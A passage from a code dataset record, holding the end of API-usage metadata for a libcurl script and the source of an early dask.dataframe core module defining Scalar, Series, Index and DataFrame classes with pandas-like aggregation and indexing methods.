183, "usage_type": "call"}, {"api_name": "libcurl.CURL", "line_number": 183, "usage_type": "attribute"}, {"api_name": "libcurl.easy_init", "line_number": 183, "usage_type": "call"}, {"api_name": "libcurl.CURLE_OK", "line_number": 186, "usage_type": "attribute"}, {"api_name": "sys.stderr", "line_number": 188, "usage_type": "attribute"}, {"api_name": "sys.stderr", "line_number": 191, "usage_type": "attribute"}, {"api_name": "libcurl.version_info", "line_number": 194, "usage_type": "call"}, {"api_name": "libcurl.CURLVERSION_NOW", "line_number": 194, "usage_type": "attribute"}, {"api_name": "sys.stderr", "line_number": 195, "usage_type": "attribute"}, {"api_name": "libcurl.CURLOPT_VERBOSE", "line_number": 197, "usage_type": "attribute"}, {"api_name": "libcurl.CURLOPT_NOPROGRESS", "line_number": 198, "usage_type": "attribute"}, {"api_name": "libcurl.CURLOPT_HEADERFUNCTION", "line_number": 199, "usage_type": "attribute"}, {"api_name": "libcurl.CURLOPT_HEADERDATA", "line_number": 200, "usage_type": "attribute"}, {"api_name": "sys.stdout", "line_number": 200, "usage_type": "attribute"}, {"api_name": "libcurl.CURLOPT_URL", "line_number": 201, "usage_type": "attribute"}, {"api_name": "sys.exit", "line_number": 229, "usage_type": "call"}]} +{"seq_id": "39913285532", "text": "from __future__ import division\n\nimport bisect\nfrom collections import Iterable, Iterator\nfrom datetime import datetime\nfrom distutils.version import LooseVersion\nfrom functools import wraps\nimport operator\nfrom operator import getitem, setitem\nfrom pprint import pformat\nimport uuid\n\nfrom toolz import merge, partial, first, partition, unique\nimport pandas as pd\nfrom pandas.util.decorators import cache_readonly\nimport numpy as np\n\ntry:\n from chest import Chest as Cache\nexcept ImportError:\n Cache = dict\n\nfrom .. import array as da\nfrom .. import core\nfrom ..array.core import partial_by_order\nfrom .. import threaded\nfrom ..compatibility import unicode, apply, operator_div, bind_method\nfrom ..utils import repr_long_list, IndexCallable, pseudorandom\nfrom .utils import shard_df_on_index\nfrom ..base import Base, compute, tokenize, normalize_token\n\nno_default = '__no_default__'\nreturn_scalar = '__return_scalar__'\n\npd.computation.expressions.set_use_numexpr(False)\n\ndef _concat(args, **kwargs):\n \"\"\" Generic concat operation \"\"\"\n if not args:\n return args\n if isinstance(first(core.flatten(args)), np.ndarray):\n return da.core.concatenate3(args)\n if len(args) == 1:\n return args[0]\n if isinstance(args[0], (pd.DataFrame, pd.Series)):\n args2 = [arg for arg in args if len(arg)]\n if not args2:\n return args[0]\n return pd.concat(args2)\n if isinstance(args[0], (pd.Index)):\n args = [arg for arg in args if len(arg)]\n result = pd.concat(map(pd.Series, args))\n result = type(args[0])(result.values)\n result.name = args[0].name\n return result\n return args\n\n\ndef optimize(dsk, keys):\n from .optimize import optimize\n return optimize(dsk, keys)\n\n\ndef finalize(self, results):\n return _concat(results)\n\n\nclass Scalar(Base):\n \"\"\" A Dask-thing to represent a scalar\n\n TODO: Clean up this abstraction\n \"\"\"\n\n _optimize = staticmethod(optimize)\n _default_get = staticmethod(threaded.get)\n _finalize = staticmethod(finalize)\n\n def __init__(self, dsk, _name, name=None, divisions=None):\n self.dask = dsk\n self._name = _name\n self.divisions = [None, None]\n\n # name and divisions are ignored.\n # There are dummies to be compat with Series and DataFrame\n\n def __array__(self):\n # array interface is required to support pandas instance + Scalar\n # Otherwise, above op results in pd.Series of Scalar (object dtype)\n return np.asarray(self.compute())\n\n @property\n def _args(self):\n return (self.dask, self._name)\n\n def _keys(self):\n return [(self._name, 0)]\n\n @classmethod\n def _get_unary_operator(cls, op):\n def f(self):\n name = tokenize(self)\n dsk = {(name, 0): (op, (self._name, 0))}\n return Scalar(merge(dsk, self.dask), name)\n return f\n\n @classmethod\n def _get_binary_operator(cls, op, inv=False):\n return lambda self, other: _scalar_binary(op, self, other, inv=inv)\n\n\ndef _scalar_binary(op, a, b, inv=False):\n name = '{0}-{1}'.format(op.__name__, tokenize(a, b))\n\n dsk = a.dask\n if not isinstance(b, Base):\n pass\n elif isinstance(b, Scalar):\n dsk = merge(dsk, b.dask)\n b = (b._name, 0)\n else:\n return NotImplemented\n\n if inv:\n dsk.update({(name, 0): (op, b, (a._name, 0))})\n else:\n dsk.update({(name, 0): (op, (a._name, 0), b)})\n\n if isinstance(b, pd.Series):\n return Series(dsk, name, b.name, [b.index.min(), b.index.max()])\n elif isinstance(b, pd.DataFrame):\n return DataFrame(dsk, name, b.columns, [b.index.min(), b.index.max()])\n else:\n return Scalar(dsk, name)\n\n\nclass _Frame(Base):\n \"\"\" Superclass for DataFrame and Series \"\"\"\n\n _optimize = staticmethod(optimize)\n _default_get = staticmethod(threaded.get)\n _finalize = staticmethod(finalize)\n\n # constructor properties\n # http://pandas.pydata.org/pandas-docs/stable/internals.html#override-constructor-properties\n\n @property\n def _constructor_sliced(self):\n \"\"\"Constructor used when a result has one lower dimension(s) as the original\"\"\"\n raise NotImplementedError\n\n @property\n def _constructor(self):\n \"\"\"Constructor used when a result has the same dimension(s) as the original\"\"\"\n raise NotImplementedError\n\n @property\n def npartitions(self):\n \"\"\"Return number of partitions\"\"\"\n return len(self.divisions) - 1\n\n def _keys(self):\n return [(self._name, i) for i in range(self.npartitions)]\n\n @property\n def index(self):\n \"\"\"Return dask Index instance\"\"\"\n name = self._name + '-index'\n dsk = dict(((name, i), (getattr, key, 'index'))\n for i, key in enumerate(self._keys()))\n return Index(merge(dsk, self.dask), name, None, self.divisions)\n\n @property\n def known_divisions(self):\n \"\"\"Whether divisions are already known\"\"\"\n return len(self.divisions) > 0 and self.divisions[0] is not None\n\n def get_division(self, n):\n \"\"\" Get nth division of the data \"\"\"\n if 0 <= n < self.npartitions:\n name = 'get-division-%s-%s' % (str(n), self._name)\n dsk = {(name, 0): (self._name, n)}\n divisions = self.divisions[n:n+2]\n return self._constructor(merge(self.dask, dsk), name,\n self.column_info, divisions)\n else:\n msg = \"n must be 0 <= n < {0}\".format(self.npartitions)\n raise ValueError(msg)\n\n def cache(self, cache=Cache):\n \"\"\" Evaluate Dataframe and store in local cache\n\n Uses chest by default to store data on disk\n \"\"\"\n if callable(cache):\n cache = cache()\n\n # Evaluate and store in cache\n name = 'cache' + uuid.uuid1().hex\n dsk = dict(((name, i), (setitem, cache, (tuple, list(key)), key))\n for i, key in enumerate(self._keys()))\n self._get(merge(dsk, self.dask), list(dsk.keys()))\n\n # Create new dataFrame pointing to that cache\n name = 'from-cache-' + self._name\n dsk2 = dict(((name, i), (getitem, cache, (tuple, list(key))))\n for i, key in enumerate(self._keys()))\n return self._constructor(dsk2, name, self.column_info, self.divisions)\n\n @wraps(pd.DataFrame.drop_duplicates)\n def drop_duplicates(self):\n chunk = lambda s: s.drop_duplicates()\n return aca(self, chunk=chunk, aggregate=chunk, columns=self.column_info,\n token='drop-duplicates')\n\n def __len__(self):\n return reduction(self, len, np.sum, token='len').compute()\n\n def map_partitions(self, func, columns=no_default, *args, **kwargs):\n \"\"\" Apply Python function on each DataFrame block\n\n When using ``map_partitions`` you should provide either the column\n names (if the result is a DataFrame) or the name of the Series (if the\n result is a Series). The output type will be determined by the type of\n ``columns``.\n\n >>> df.map_partitions(lambda df: df.x + 1, columns='x') # doctest: +SKIP\n\n >>> df.map_partitions(lambda df: df.head(), columns=df.columns) # doctest: +SKIP\n\n Parameters\n ----------\n\n func: function\n Function applied to each blocks\n columns: tuple or scalar\n Column names or name of the output. Defaults to names of data itself.\n When tuple is passed, DataFrame is returned. When scalar is passed,\n Series is returned.\n \"\"\"\n if columns == no_default:\n columns = self.column_info\n return map_partitions(func, columns, self, *args, **kwargs)\n\n def random_split(self, p, seed=None):\n \"\"\" Pseudorandomly split dataframe into different pieces row-wise\n\n 50/50 split\n >>> a, b = df.random_split([0.5, 0.5]) # doctest: +SKIP\n\n 80/10/10 split, consistent seed\n >>> a, b, c = df.random_split([0.8, 0.1, 0.1], seed=123) # doctest: +SKIP\n \"\"\"\n seeds = np.random.RandomState(seed).randint(0, np.iinfo(np.int32).max,\n self.npartitions)\n dsk_full = dict(((self._name + '-split-full', i),\n (pd_split, (self._name, i), p, seed))\n for i, seed in enumerate(seeds))\n\n dsks = [dict(((self._name + '-split-%d' % i, j),\n (getitem, (self._name + '-split-full', j), i))\n for j in range(self.npartitions))\n for i in range(len(p))]\n return [type(self)(merge(self.dask, dsk_full, dsk),\n self._name + '-split-%d' % i,\n self.column_info,\n self.divisions)\n for i, dsk in enumerate(dsks)]\n\n def head(self, n=5, compute=True):\n \"\"\" First n rows of the dataset\n\n Caveat, the only checks the first n rows of the first partition.\n \"\"\"\n name = 'head-%d-%s' % (n, self._name)\n dsk = {(name, 0): (lambda x, n: x.head(n=n), (self._name, 0), n)}\n\n result = self._constructor(merge(self.dask, dsk), name,\n self.column_info, self.divisions[:2])\n\n if compute:\n result = result.compute()\n return result\n\n def tail(self, n=5, compute=True):\n \"\"\" Last n rows of the dataset\n\n Caveat, the only checks the last n rows of the last partition.\n \"\"\"\n name = 'tail-%d-%s' % (n, self._name)\n dsk = {(name, 0): (lambda x, n: x.tail(n=n),\n (self._name, self.npartitions - 1), n)}\n\n result = self._constructor(merge(self.dask, dsk), name,\n self.column_info, self.divisions[-2:])\n\n if compute:\n result = result.compute()\n return result\n\n def _loc(self, ind):\n \"\"\" Helper function for the .loc accessor \"\"\"\n if isinstance(ind, Series):\n return self._loc_series(ind)\n elif isinstance(ind, slice):\n return self._loc_slice(ind)\n else:\n return self._loc_element(ind)\n\n def _loc_series(self, ind):\n if not self.divisions == ind.divisions:\n raise ValueError(\"Partitions of dataframe and index not the same\")\n return map_partitions(lambda df, ind: df.loc[ind],\n self.columns, self, ind, token='loc-series')\n\n def _loc_element(self, ind):\n name = 'loc-element-%s-%s' % (str(ind), self._name)\n part = _partition_of_index_value(self.divisions, ind)\n if ind < self.divisions[0] or ind > self.divisions[-1]:\n raise KeyError('the label [%s] is not in the index' % str(ind))\n dsk = {(name, 0): (lambda df: df.loc[ind], (self._name, part))}\n\n if self.ndim == 1:\n columns = self.column_info\n else:\n columns = ind\n return self._constructor_sliced(merge(self.dask, dsk), name,\n columns, [ind, ind])\n\n def _loc_slice(self, ind):\n name = 'loc-slice-%s-%s' % (str(ind), self._name)\n assert ind.step in (None, 1)\n if ind.start:\n start = _partition_of_index_value(self.divisions, ind.start)\n else:\n start = 0\n if ind.stop is not None:\n stop = _partition_of_index_value(self.divisions, ind.stop)\n else:\n stop = self.npartitions - 1\n istart = _coerce_loc_index(self.divisions, ind.start)\n istop = _coerce_loc_index(self.divisions, ind.stop)\n if stop == start:\n dsk = {(name, 0): (_loc, (self._name, start), ind.start, ind.stop)}\n divisions = [istart, istop]\n else:\n dsk = merge(\n {(name, 0): (_loc, (self._name, start), ind.start, None)},\n dict(((name, i), (self._name, start + i))\n for i in range(1, stop - start)),\n {(name, stop - start): (_loc, (self._name, stop), None, ind.stop)})\n\n divisions = ((max(istart, self.divisions[start])\n if ind.start is not None\n else self.divisions[0],) +\n self.divisions[start+1:stop+1] +\n (min(istop, self.divisions[stop+1])\n if ind.stop is not None\n else self.divisions[-1],))\n\n assert len(divisions) == len(dsk) + 1\n return self._constructor(merge(self.dask, dsk), name,\n self.column_info, divisions)\n\n @property\n def loc(self):\n \"\"\" Purely label-location based indexer for selection by label.\n\n >>> df.loc[\"b\"] # doctest: +SKIP\n >>> df.loc[\"b\":\"d\"] # doctest: +SKIP\"\"\"\n return IndexCallable(self._loc)\n\n @property\n def iloc(self):\n \"\"\" Not implemented \"\"\"\n\n # not implemented because of performance concerns.\n # see https://github.com/blaze/dask/pull/507\n raise NotImplementedError(\"Dask Dataframe does not support iloc\")\n\n def repartition(self, divisions, force=False):\n \"\"\" Repartition dataframe along new divisions\n\n Parameters\n ----------\n\n divisions: list\n List of partitions to be used\n force: bool, default False\n Allows the expansion of the existing divisions.\n If False then the new divisions lower and upper bounds must be\n the same as the old divisions.\n\n >>> df = df.repartition([0, 5, 10, 20]) # doctest: +SKIP\n \"\"\"\n return repartition(self, divisions, force=force)\n\n def __getstate__(self):\n return self.__dict__\n\n def __setstate__(self, dict):\n self.__dict__ = dict\n\n @wraps(pd.Series.fillna)\n def fillna(self, value):\n func = getattr(self._partition_type, 'fillna')\n return map_partitions(func, self.column_info, self, value)\n\n def sample(self, frac, random_state=None):\n \"\"\" Random sample of items\n\n This only implements the ``frac`` option from pandas.\n\n See Also:\n pd.DataFrame.sample\n \"\"\"\n if random_state is None:\n random_state = np.random.randint(np.iinfo(np.int32).max)\n\n name = 'sample-' + tokenize(self, frac, random_state)\n func = getattr(self._partition_type, 'sample')\n\n if not isinstance(random_state, np.random.RandomState):\n random_state = np.random.RandomState(random_state)\n seeds = random_state.randint(np.iinfo(np.int32).max,\n size=self.npartitions)\n\n dsk = dict(((name, i),\n (apply, func, (tuple, [(self._name, i)]),\n {'frac': frac, 'random_state': seed}))\n for i, seed in zip(range(self.npartitions), seeds))\n\n return self._constructor(merge(self.dask, dsk), name,\n self.column_info, self.divisions)\n\n @wraps(pd.DataFrame.to_hdf)\n def to_hdf(self, path_or_buf, key, mode='a', append=False, complevel=0,\n complib=None, fletcher32=False, **kwargs):\n from .io import to_hdf\n return to_hdf(self, path_or_buf, key, mode, append, complevel, complib,\n fletcher32, **kwargs)\n\n @wraps(pd.DataFrame.to_csv)\n def to_csv(self, filename, **kwargs):\n from .io import to_csv\n return to_csv(self, filename, **kwargs)\n\n @property\n def _elemwise_cols(self):\n \"\"\"passed to elemwise ops, None for Series, columns for DataFrame\"\"\"\n return None\n\n @classmethod\n def _get_unary_operator(cls, op):\n return lambda self: elemwise(op, self, columns=self._elemwise_cols)\n\n @classmethod\n def _get_binary_operator(cls, op, inv=False):\n if inv:\n return lambda self, other: elemwise(op, other, self,\n columns=self._elemwise_cols)\n else:\n return lambda self, other: elemwise(op, self, other,\n columns=self._elemwise_cols)\n\n def _aca_agg(self, token, func, aggfunc=None):\n \"\"\" Wrapper for aggregations \"\"\"\n raise NotImplementedError\n\n @wraps(pd.DataFrame.sum)\n def sum(self, axis=None):\n axis = self._validate_axis(axis)\n if axis == 1:\n f = lambda x: x.sum(axis=1)\n name = '{0}sum(axis=1)'.format(self._token_prefix)\n return map_partitions(f, None, self, token=name)\n else:\n return self._aca_agg(token='sum', func=lambda x: x.sum())\n\n @wraps(pd.DataFrame.max)\n def max(self, axis=None):\n axis = self._validate_axis(axis)\n if axis == 1:\n f = lambda x: x.max(axis=1)\n name = '{0}max(axis=1)'.format(self._token_prefix)\n return map_partitions(f, None, self, token=name)\n else:\n return self._aca_agg(token='max', func=lambda x: x.max())\n\n @wraps(pd.DataFrame.min)\n def min(self, axis=None):\n axis = self._validate_axis(axis)\n if axis == 1:\n f = lambda x: x.min(axis=1)\n name = '{0}min(axis=1)'.format(self._token_prefix)\n return map_partitions(f, None, self, token=name)\n else:\n return self._aca_agg(token='min', func=lambda x: x.min())\n\n @wraps(pd.DataFrame.count)\n def count(self, axis=None):\n axis = self._validate_axis(axis)\n if axis == 1:\n f = lambda x: x.count(axis=1)\n name = '{0}count(axis=1)'.format(self._token_prefix)\n return map_partitions(f, None, self, token=name)\n else:\n return self._aca_agg(token='count', func=lambda x: x.count(),\n aggfunc=lambda x: x.sum())\n\n @wraps(pd.DataFrame.mean)\n def mean(self, axis=None):\n axis = self._validate_axis(axis)\n if axis == 1:\n f = lambda x: x.mean(axis=1)\n name = '{0}mean(axis=1)'.format(self._token_prefix)\n return map_partitions(f, None, self, token=name)\n else:\n num = self._get_numeric_data()\n s = num.sum()\n n = num.count()\n\n def f(s, n):\n try:\n return s / n\n except ZeroDivisionError:\n return np.nan\n name = '{0}mean-{1}'.format(self._token_prefix, tokenize(s))\n return map_partitions(f, no_default, s, n, token=name)\n\n @wraps(pd.DataFrame.var)\n def var(self, axis=None, ddof=1):\n axis = self._validate_axis(axis)\n if axis == 1:\n f = lambda x, ddof=ddof: x.var(axis=1, ddof=ddof)\n name = '{0}var(axis=1, ddof={1})'.format(self._token_prefix, ddof)\n return map_partitions(f, None, self, token=name)\n else:\n num = self._get_numeric_data()\n x = 1.0 * num.sum()\n x2 = 1.0 * (num ** 2).sum()\n n = num.count()\n\n def f(x2, x, n):\n try:\n result = (x2 / n) - (x / n)**2\n if ddof:\n result = result * n / (n - ddof)\n return result\n except ZeroDivisionError:\n return np.nan\n name = '{0}var(ddof={1})'.format(self._token_prefix, ddof)\n return map_partitions(f, no_default, x2, x, n, token=name)\n\n @wraps(pd.DataFrame.std)\n def std(self, axis=None, ddof=1):\n axis = self._validate_axis(axis)\n if axis == 1:\n f = lambda x, ddof=ddof: x.std(axis=1, ddof=ddof)\n name = '{0}std(axis=1, ddof={1})'.format(self._token_prefix, ddof)\n return map_partitions(f, None, self, token=name)\n else:\n v = self.var(ddof=ddof)\n name = '{0}std(ddof={1})'.format(self._token_prefix, ddof)\n return map_partitions(np.sqrt, no_default, v, token=name)\n\n def quantile(self, q=0.5, axis=0):\n \"\"\" Approximate row-wise and precise column-wise quantiles of DataFrame\n\n q : list/array of floats, default 0.5 (50%)\n Iterable of numbers ranging from 0 to 1 for the desired quantiles\n axis : {0, 1, 'index', 'columns'} (default 0)\n 0 or 'index' for row-wise, 1 or 'columns' for column-wis\n \"\"\"\n axis = self._validate_axis(axis)\n name = 'quantiles-concat--' + tokenize(self, q, axis)\n\n if axis == 1:\n if isinstance(q, list):\n # Not supported, the result will have current index as columns\n raise ValueError(\"'q' must be scalar when axis=1 is specified\")\n return map_partitions(pd.DataFrame.quantile, None, self,\n q, axis, token=name)\n else:\n num = self._get_numeric_data()\n quantiles = tuple(quantile(self[c], q) for c in num.columns)\n\n dask = {}\n dask = merge(dask, *[q.dask for q in quantiles])\n qnames = [(q._name, 0) for q in quantiles]\n\n if isinstance(quantiles[0], Scalar):\n dask[(name, 0)] = (pd.Series, (list, qnames), num.columns)\n divisions = (min(num.columns), max(num.columns))\n return Series(dask, name, num.columns, divisions)\n else:\n from .multi import _pdconcat\n dask[(name, 0)] = (_pdconcat, (list, qnames), 1)\n return DataFrame(dask, name, num.columns,\n quantiles[0].divisions)\n\n def _cum_agg(self, token, chunk, aggregate, agginit):\n \"\"\" Wrapper for cumulative operation \"\"\"\n # cumulate each partitions\n name1 = '{0}{1}-map'.format(self._token_prefix, token)\n cumpart = map_partitions(chunk, self.column_info, self, token=name1)\n # take last element of each cumulated partitions\n name2 = '{0}{1}-take-last'.format(self._token_prefix, token)\n cumlast = map_partitions(lambda x: x.iloc[-1],\n self.column_info, cumpart, token=name2)\n\n name = '{0}{1}'.format(self._token_prefix, token)\n cname = '{0}{1}-cum-last'.format(self._token_prefix, token)\n\n # aggregate cumulated partisions and its previous last element\n dask = {}\n if isinstance(self, DataFrame):\n agginit = pd.Series(agginit, index=self.column_info)\n dask[(cname, 0)] = agginit\n dask[(name, 0)] = (cumpart._name, 0)\n for i in range(1, self.npartitions):\n # store each cumulative step to graph to reduce computation\n dask[(cname, i)] = (aggregate, (cname, i - 1),\n (cumlast._name, i - 1))\n dask[(name, i)] = (aggregate, (cumpart._name, i), (cname, i))\n return self._constructor(merge(dask, cumpart.dask, cumlast.dask),\n name, self.column_info, self.divisions)\n\n @wraps(pd.DataFrame.cumsum)\n def cumsum(self, axis=None):\n axis = self._validate_axis(axis)\n if axis == 1:\n name = '{0}cumsum(axis=1)'.format(self._token_prefix)\n return map_partitions(self._partition_type.cumsum,\n self.column_info, self, 1, token=name)\n else:\n return self._cum_agg('cumsum', self._partition_type.cumsum,\n operator.add, 0)\n\n @wraps(pd.DataFrame.cumprod)\n def cumprod(self, axis=None):\n axis = self._validate_axis(axis)\n if axis == 1:\n name = '{0}cumprod(axis=1)'.format(self._token_prefix)\n return map_partitions(self._partition_type.cumprod,\n self.column_info, self, 1, token=name)\n else:\n return self._cum_agg('cumprod', self._partition_type.cumprod,\n operator.mul, 1)\n\n @wraps(pd.DataFrame.cummax)\n def cummax(self, axis=None):\n axis = self._validate_axis(axis)\n if axis == 1:\n name = '{0}cummax(axis=1)'.format(self._token_prefix)\n return map_partitions(self._partition_type.cummax,\n self.column_info, self, 1, token=name)\n else:\n def aggregate(x, y):\n if isinstance(x, (pd.Series, pd.DataFrame)):\n return x.where(x > y, y, axis=x.ndim - 1)\n else: # scalsr\n return x if x > y else y\n return self._cum_agg('cummax', self._partition_type.cummax,\n aggregate, np.nan)\n\n @wraps(pd.DataFrame.cummin)\n def cummin(self, axis=None):\n axis = self._validate_axis(axis)\n if axis == 1:\n name = '{0}cummin(axis=1)'.format(self._token_prefix)\n return map_partitions(self._partition_type.cummin,\n self.column_info, self, 1, token=name)\n else:\n def aggregate(x, y):\n if isinstance(x, (pd.Series, pd.DataFrame)):\n return x.where(x < y, y, axis=x.ndim - 1)\n else: # scalar\n return x if x < y else y\n return self._cum_agg('cummin', self._partition_type.cummin,\n aggregate, np.nan)\n\n @classmethod\n def _bind_operator_method(cls, name, op):\n \"\"\" bind operator method like DataFrame.add to this class \"\"\"\n raise NotImplementedError\n\n\nnormalize_token.register((Scalar, _Frame), lambda a: a._name)\n\n\nclass Series(_Frame):\n \"\"\" Out-of-core Series object\n\n Mimics ``pandas.Series``.\n\n See Also\n --------\n\n dask.dataframe.DataFrame\n \"\"\"\n\n _partition_type = pd.Series\n _token_prefix = 'series-'\n\n def __init__(self, dsk, _name, name, divisions):\n self.dask = dsk\n self._name = _name\n self.name = name\n self.divisions = tuple(divisions)\n self.dt = DatetimeAccessor(self)\n self.str = StringAccessor(self)\n\n @property\n def _args(self):\n return (self.dask, self._name, self.name, self.divisions)\n\n @property\n def _constructor_sliced(self):\n return Scalar\n\n @property\n def _constructor(self):\n return Series\n\n @property\n def _empty_partition(self):\n \"\"\" Return empty dummy to emulate the result \"\"\"\n return self._partition_type(name=self.name)\n\n @property\n def ndim(self):\n \"\"\" Return dimensionality \"\"\"\n return 1\n\n @property\n def dtype(self):\n \"\"\" Return data type \"\"\"\n return self.head().dtype\n\n @property\n def column_info(self):\n \"\"\" Return Series.name \"\"\"\n return self.name\n\n @property\n def columns(self):\n \"\"\" Return 1 element tuple containing the name \"\"\"\n return (self.name,)\n\n @property\n def nbytes(self):\n return reduction(self, lambda s: s.nbytes, np.sum, token='nbytes')\n\n def __repr__(self):\n return (\"dd.%s<%s, divisions=%s>\" %\n (self.__class__.__name__, self._name,\n repr_long_list(self.divisions)))\n\n def __array__(self, dtype=None, **kwargs):\n x = np.array(self.compute())\n if dtype and x.dtype != dtype:\n x = x.astype(dtype)\n return x\n\n def __array_wrap__(self, array, context=None):\n return pd.Series(array, name=self.name)\n\n def quantile(self, q=0.5):\n \"\"\" Approximate quantiles of Series\n\n q : list/array of floats, default 0.5 (50%)\n Iterable of numbers ranging from 0 to 1 for the desired quantiles\n \"\"\"\n return quantile(self, q)\n\n def resample(self, rule, how='mean', axis=0, fill_method=None, closed=None,\n label=None, convention='start', kind=None, loffset=None,\n limit=None, base=0):\n \"\"\"Group by a DatetimeIndex values in time periods of size `rule`.\n\n Parameters\n ----------\n rule : str or pandas.datetools.Tick\n The frequency to resample by. For example, 'H' is one hour\n intervals.\n how : str or callable\n Method to use to summarize your data. For example, 'mean' takes the\n average value of the Series in the time interval `rule`.\n\n Notes\n -----\n For additional argument descriptions please consult the pandas\n documentation.\n\n Returns\n -------\n dask.dataframe.Series\n\n See Also\n --------\n pandas.Series.resample\n \"\"\"\n\n divs = pd.Series(range(len(self.divisions)), index=self.divisions)\n temp = divs.resample(rule, how='count', axis=axis, fill_method=fill_method,\n closed=closed, label=label, convention=convention,\n kind=kind, loffset=loffset, limit=limit, base=base)\n newdivs = temp.loc[temp > 0].index.tolist()\n if newdivs[-1] < self.divisions[-1]:\n newdivs.append(self.divisions[-1])\n if newdivs[0] > self.divisions[0]:\n newdivs.insert(0, self.divisions[0])\n\n day_nanos = pd.datetools.Day().nanos\n\n rule = pd.datetools.to_offset(rule)\n\n if getattr(rule, 'nanos', None) and day_nanos % rule.nanos:\n raise NotImplementedError('Resampling frequency %s that does'\n ' not evenly divide a day is not '\n 'implemented' % rule)\n\n return map_partitions(pd.Series.resample, self.name,\n self.repartition(newdivs, force=True),\n rule=rule, how=how, axis=axis,\n fill_method=fill_method, closed=closed, label=label,\n convention=convention, kind=kind, loffset=loffset, limit=limit,\n base=base)\n\n def __getitem__(self, key):\n if isinstance(key, Series) and self.divisions == key.divisions:\n name = 'series-index-%s[%s]' % (self._name, key._name)\n dsk = dict(((name, i), (operator.getitem, (self._name, i),\n (key._name, i)))\n for i in range(self.npartitions))\n return Series(merge(self.dask, key.dask, dsk), name,\n self.name, self.divisions)\n raise NotImplementedError()\n\n @wraps(pd.DataFrame._get_numeric_data)\n def _get_numeric_data(self, how='any', subset=None):\n return self\n\n @classmethod\n def _validate_axis(cls, axis=0):\n if axis not in (0, 'index', None):\n raise ValueError('No axis named {0}'.format(axis))\n # convert to numeric axis\n return {None: 0, 'index': 0}.get(axis, axis)\n\n def _aca_agg(self, token, func, aggfunc=None):\n \"\"\" Wrapper for aggregations \"\"\"\n if aggfunc is None:\n aggfunc = func\n\n return aca([self], chunk=func,\n aggregate=lambda x: aggfunc(pd.Series(x)),\n columns=return_scalar, token=self._token_prefix + token)\n\n @wraps(pd.Series.groupby)\n def groupby(self, index, **kwargs):\n return SeriesGroupBy(self, index, **kwargs)\n\n @wraps(pd.Series.sum)\n def sum(self, axis=None):\n return super(Series, self).sum(axis=axis)\n\n @wraps(pd.Series.max)\n def max(self, axis=None):\n return super(Series, self).max(axis=axis)\n\n @wraps(pd.Series.min)\n def min(self, axis=None):\n return super(Series, self).min(axis=axis)\n\n @wraps(pd.Series.count)\n def count(self):\n return super(Series, self).count()\n\n @wraps(pd.Series.mean)\n def mean(self, axis=None):\n return super(Series, self).mean(axis=axis)\n\n @wraps(pd.Series.var)\n def var(self, axis=None, ddof=1):\n return super(Series, self).var(axis=axis, ddof=ddof)\n\n @wraps(pd.Series.std)\n def std(self, axis=None, ddof=1):\n return super(Series, self).std(axis=axis, ddof=ddof)\n\n @wraps(pd.Series.cumsum)\n def cumsum(self, axis=None):\n return super(Series, self).cumsum(axis=axis)\n\n @wraps(pd.Series.cumprod)\n def cumprod(self, axis=None):\n return super(Series, self).cumprod(axis=axis)\n\n @wraps(pd.Series.cummax)\n def cummax(self, axis=None):\n return super(Series, self).cummax(axis=axis)\n\n @wraps(pd.Series.cummin)\n def cummin(self, axis=None):\n return super(Series, self).cummin(axis=axis)\n\n @wraps(pd.Series.nunique)\n def nunique(self):\n return self.drop_duplicates().count()\n\n @wraps(pd.Series.value_counts)\n def value_counts(self):\n chunk = lambda s: s.value_counts()\n if LooseVersion(pd.__version__) > '0.16.2':\n agg = lambda s: s.groupby(level=0).sum().sort_values(ascending=False)\n else:\n agg = lambda s: s.groupby(level=0).sum().sort(inplace=False, ascending=False)\n return aca(self, chunk=chunk, aggregate=agg, columns=self.name,\n token='value-counts')\n\n @wraps(pd.Series.nlargest)\n def nlargest(self, n=5):\n return nlargest(self, n)\n\n @wraps(pd.Series.isin)\n def isin(self, other):\n return elemwise(pd.Series.isin, self, other)\n\n @wraps(pd.Series.map)\n def map(self, arg, na_action=None):\n return elemwise(pd.Series.map, self, arg, na_action, name=self.name)\n\n @wraps(pd.Series.astype)\n def astype(self, dtype):\n return map_partitions(pd.Series.astype, self.name, self, dtype)\n\n @wraps(pd.Series.dropna)\n def dropna(self):\n return map_partitions(pd.Series.dropna, self.name, self)\n\n @wraps(pd.Series.between)\n def between(self, left, right, inclusive=True):\n return map_partitions(pd.Series.between, self.name, self, left, right,\n inclusive)\n\n @wraps(pd.Series.clip)\n def clip(self, lower=None, upper=None):\n return map_partitions(pd.Series.clip, self.name, self, lower, upper)\n\n @wraps(pd.Series.notnull)\n def notnull(self):\n return map_partitions(pd.Series.notnull, self.name, self)\n\n def to_bag(self, index=False):\n \"\"\"Convert to a dask Bag.\n\n Parameters\n ----------\n index : bool, optional\n If True, the elements are tuples of ``(index, value)``, otherwise\n they're just the ``value``. Default is False.\n \"\"\"\n from .io import to_bag\n return to_bag(self, index)\n\n @wraps(pd.Series.to_frame)\n def to_frame(self, name=None):\n _name = name if name is not None else self.name\n return map_partitions(pd.Series.to_frame, [_name], self, name)\n\n @classmethod\n def _bind_operator_method(cls, name, op):\n \"\"\" bind operator method like DataFrame.add to this class \"\"\"\n\n def meth(self, other, level=None, fill_value=None, axis=0):\n if not level is None:\n raise NotImplementedError('level must be None')\n return map_partitions(op, self.column_info, self, other,\n axis=axis, fill_value=fill_value)\n meth.__doc__ = op.__doc__\n bind_method(cls, name, meth)\n\n def apply(self, func, convert_dtype=True, name=no_default, args=(), **kwds):\n \"\"\" Parallel version of pandas.Series.apply \"\"\"\n if name is no_default:\n name = self.name\n return map_partitions(pd.Series.apply, name, self, func,\n convert_dtype, args, **kwds)\n\n\nclass Index(Series):\n\n _token_prefix = 'index-'\n\n @property\n def index(self):\n msg = \"'{0}' object has no attribute 'index'\"\n raise AttributeError(msg.format(self.__class__.__name__))\n\n @property\n def _constructor(self):\n return Index\n\n def nunique(self):\n return self.drop_duplicates().count()\n\n def count(self):\n f = lambda x: pd.notnull(x).sum()\n return reduction(self, f, np.sum, token='index-count')\n\n\nclass DataFrame(_Frame):\n \"\"\"\n Implements out-of-core DataFrame as a sequence of pandas DataFrames\n\n Parameters\n ----------\n\n dask: dict\n The dask graph to compute this Dataframe\n name: str\n The key prefix that specifies which keys in the dask comprise this\n particular DataFrame\n columns: list of strings\n Column names. This metadata aids usability\n divisions: tuple of index values\n Values along which we partition our blocks on the index\n \"\"\"\n\n _partition_type = pd.DataFrame\n _token_prefix = 'dataframe-'\n\n def __init__(self, dask, name, columns, divisions):\n self.dask = dask\n self._name = name\n self.columns = tuple(columns)\n self.divisions = tuple(divisions)\n\n 